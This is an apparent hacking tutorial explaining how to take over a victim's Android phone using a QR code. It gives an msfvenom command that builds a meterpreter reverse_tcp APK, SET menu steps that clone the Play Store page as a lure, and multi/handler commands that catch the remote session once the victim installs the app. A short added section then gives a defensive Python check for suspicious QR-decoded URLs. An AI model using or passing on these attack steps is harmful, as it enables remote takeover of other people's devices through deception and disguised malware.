A QR Code is a two-dimensional barcode which can be scanned using smartphones or dedicated QR readers. These QR Codes link directly to contact numbers, websites, usernames, photos, SMS, e-mails and even encryption, but they do not end there. QR Codes are a big deal in Japan, and it is just a matter of time before they take over the whole world as SEO grows.
By now every one of you must have understood that QR Codes are the 'next big thing'; let's make them a big thing with regard to hacking. Yes! In this article we are going to hack our victim's mobile in some easy steps using a QR Code. All you need for this is your beloved Kali Linux.
Our first step is to create a malicious file using msfvenom:
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.100 lport=6666 > /root/Desktop/Launcher.apk
Now open SET. Through SET we will turn the HTA attack into an APK attack to gain access to the victim's smartphone. From the SET menu, select the 2nd option, Website Attack Vectors.
Then select the 8th option, HTA Attack Method.
Then select Site Cloner by typing 2.
When you type 2, it will ask you to enter the URL that you want to clone. Here, give the URL of the Play Store: https://play.google.com/store
Then, when it asks you to select a meterpreter option, type 3, as we want to select reverse_tcp.
Next, save the launcher.apk file that you created using msfvenom to /var/www/html/
Also change the name of the launcher.hta file that SET has just created to launcher.apk.
Now add the QR Code Extension to your Chrome browser. The QR Code Extension will generate a QR Code for you according to your attack.
Now start multi/handler so that you get your session in time. For this, type:
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.100
set lport 6666
run
Now you can move ahead and make the victim scan your code and install the app.
And voila! As soon as the code has been scanned, you will have your meterpreter session.
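
Seen from the defender's side, the delivery chain above shows up in the URL the QR code decodes to: plain HTTP, a private IP address as host, a direct .apk download, or a Play Store look-alike served from somewhere other than play.google.com. The Python check below is an added example, not part of the original article; the function name, reason labels, trusted-host list and sample URLs are assumptions constructed for illustration.

```python
import ipaddress
from urllib.parse import urlsplit

# Assumption: the only host this policy accepts for app installs.
TRUSTED_STORE_HOSTS = {"play.google.com"}

def triage_qr_url(decoded):
    """Return a sorted list of reasons a QR-decoded URL looks unsafe."""
    reasons = set()
    parts = urlsplit(decoded.strip())
    host = (parts.hostname or "").lower()
    path = parts.path.lower()

    # The cloned page in the article is served by a local web server.
    if parts.scheme != "https":
        reasons.add("not-https")

    # A raw IP address instead of a domain name, e.g. the lhost used above.
    try:
        ip = ipaddress.ip_address(host)
        reasons.add("ip-literal-host")
        if ip.is_private or ip.is_loopback:
            reasons.add("private-address")
    except ValueError:
        pass  # host is a name (or empty), not an IP literal

    # Apps from the real store are not delivered as a bare .apk link.
    if path.endswith(".apk"):
        reasons.add("direct-apk-download")

    # Store-like path or name on a host that is not the real store.
    if host not in TRUSTED_STORE_HOSTS and (
        path.startswith("/store") or "play.google" in host
    ):
        reasons.add("store-lookalike")

    return sorted(reasons)

# Constructed sample inputs (not captured from real traffic).
SAMPLES = [
    "https://play.google.com/store",
    "http://192.168.1.100/store",
    "http://192.168.1.100/Launcher.apk",
    "https://play.google.com.example.net/store/apps",
]

if __name__ == "__main__":
    for url in SAMPLES:
        print(url, "->", triage_qr_url(url) or "no findings")
```

A mobile-device policy that also blocks installation from unknown sources stops the final step even when a user follows such a link.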